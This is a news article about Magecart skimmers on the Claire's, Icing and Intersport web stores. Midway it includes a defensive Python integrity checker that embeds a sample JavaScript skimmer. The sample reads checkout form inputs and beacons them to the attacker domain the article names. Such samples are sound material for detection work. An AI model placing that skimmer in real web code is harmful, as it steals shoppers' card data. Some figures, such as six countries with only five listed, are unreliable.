Magecart group hacked Claire’s and Icing websites to steal credentials

Web skimmers have been found leaking customers' credentials and credit card data on the Claire's and Icing websites

Magecart group attacked three online shops hosted by Salesforce during the coronavirus pandemic

Claire's, an American retailer of accessories, jewelry, toys, and other products aimed at teen and tween girls, has been attacked by the infamous hacking group dubbed Magecart[1]. According to security researchers from Sansec[2], the retail giant, which has 3,469 stores in 37 countries and billions of buyers across the globe, was hacked on April 20 by this persistent skimming group, which had been leaking customers' payment information from the retailer's official website for nearly two months.

According to the researchers from the Sansec Security report, the Magecart attack started at the end of April, when Claire's closed down over 3,000 stores due to the worldwide COVID-19 pandemic[3]. The skimmers injected malicious JavaScript into various sections of the Claire's website and harvested credit card details, names, and other confidential information from visitors who made purchases on the store up until June 13.

The subsidiary Icing web store also experienced a Magecart attack

The data was skimmed for nearly two months. Given that many countries around the world declared quarantine during those two months, which significantly increased online sales, the number of skimmed credentials could be substantial.

The actual damage will be revealed by the investigation. However, cybersecurity experts revealed that the Claire's website was not the only one attacked by the Magecart gang: the subsidiary site Icing was hit as well. Both domains were compromised through injected malicious JavaScript, which allowed the scammers to read the information that visitors of the two online shops entered during checkout and send it to the claires-assets.com server.

According to Sanguine Security's Willem de Groot, the suspicious behavior was first noticed on March 20, the day after the physical Claire's stores closed. An unknown third party registered the domain CLAIRES-ASSETS.COM. Four weeks later, the researchers found malicious code added to the app.min.js file, which is normally a legitimate file hosted on the servers of these stores.
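The pattern described above (a legitimate first-party script modified in place, with checkout form data sent to a newly registered domain) is what a store's own integrity monitoring should catch. The following is an added defender-side example, not code from the article or from any of the retailers: it compares a fetched copy of a script against a baseline hash and flags any destination hostname that is not on the store's allowlist. The script contents, the `shop.example` allowlist entry, and the baseline are all constructed for illustration; only the exfiltration domain is the one the article names.

```python
import hashlib
import re

# Constructed sample: a simplified legitimate app.min.js captured at baseline time.
BASELINE_JS = (
    "!function(){var a=document.querySelector('#cart');"
    "fetch('https://shop.example/api/cart').then(function(r){return r.json()})"
    ".then(function(j){a.textContent=j.count})}();"
)
# Constructed sample: the same file with a skimmer appended, modelled on the
# article's description (reads checkout fields, posts them to an attacker domain).
TAMPERED_JS = BASELINE_JS + (
    "!function(){document.addEventListener('submit',function(){"
    "var d={};document.querySelectorAll('input').forEach(function(i){d[i.name]=i.value});"
    "navigator.sendBeacon('https://claires-assets.com/c',JSON.stringify(d))})}();"
)

# Hostnames the store's own scripts are allowed to talk to (constructed allowlist).
ALLOWED_HOSTS = {"shop.example"}

# A skimmer needs both a way to read form data and a way to send it somewhere.
FORM_READ = re.compile(r"querySelectorAll\(['\"]input|document\.forms|\.value\b")
EXFIL_SEND = re.compile(r"sendBeacon|XMLHttpRequest|fetch\(|new Image\(")
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def sha256_hex(content: str) -> str:
    return hashlib.sha256(content.encode()).hexdigest()


def extract_hosts(js: str) -> set:
    """Return every hostname referenced by an absolute URL literal in the script."""
    return {m.group(1).lower() for m in HOST_RE.finditer(js)}


def audit_script(js: str, baseline_hash: str, allowed_hosts: set) -> dict:
    """Compare a fetched script against its baseline and flag skimmer indicators."""
    unexpected = extract_hosts(js) - allowed_hosts
    return {
        "hash_changed": sha256_hex(js) != baseline_hash,
        "unexpected_hosts": unexpected,
        # Form reading plus an unlisted destination matches the behaviour
        # described in the article; either alone is common in benign code.
        "skimmer_indicator": bool(unexpected)
        and FORM_READ.search(js) is not None
        and EXFIL_SEND.search(js) is not None,
    }


if __name__ == "__main__":
    baseline = sha256_hex(BASELINE_JS)
    print(audit_script(TAMPERED_JS, baseline, ALLOWED_HOSTS))
```

In production the same check belongs in a scheduled job that fetches the live script, and a Content-Security-Policy `connect-src` limited to the allowlisted hosts blocks the exfiltration even before monitoring notices the change.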

Claire's was quick to respond to the issue and took immediate action to remove the malicious code from its domains. The company's spokesperson replied to the Sanguine Security team:

Claire’s cares about protecting its customers’ data. On Friday, we identified an issue related to our e-commerce platform and took immediate action to investigate and address it. Our investigation identified the unauthorized insertion of code to our e-commerce platform designed to obtain payment card data entered by customers during the checkout process. We removed that code and have taken additional measures to reinforce the security of our platform.

ESET found a skimmer on several Intersport websites

The security firm ESET has confirmed yet another skimming attack by the Magecart scammers, this one affecting some of the Intersport websites[4]. Intersport is one of the largest retailers of sports-related products, clothing, and equipment.

Close analysis revealed that only customers in 6 of the 40 countries are at risk of having had their credit card details and other PII exposed while making purchases. These countries are: Croatia, Serbia, Slovenia, Montenegro, and Bosnia and Herzegovina.

The Magecart attack on the Intersport websites was discovered on April 30. The company's security experts removed the malicious JavaScript, but the hackers re-attacked these domains on May 14. All of the affected retailers (Claire's, Icing, and Intersport) appear to be hosted on Salesforce Commerce Cloud, an e-commerce platform that serves many online stores worldwide. Similar attacks previously hit the UK online shop Sweaty Betty and Hanna Andersson, so experts are actively working to identify the causes and to determine whether Salesforce bears responsibility for the poorly protected domains.

It is clear that the scammers planned ahead: they anticipated a huge increase in online shopping during the pandemic[5]. This is why the malicious code was injected at the same time that countries began announcing quarantines one by one.

People who made purchases on the listed online stores between March 20 and June 13 should take precautionary measures to prevent unauthorized transactions from their bank accounts.

About the author
Gabriel E. Hall, passionate web researcher

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
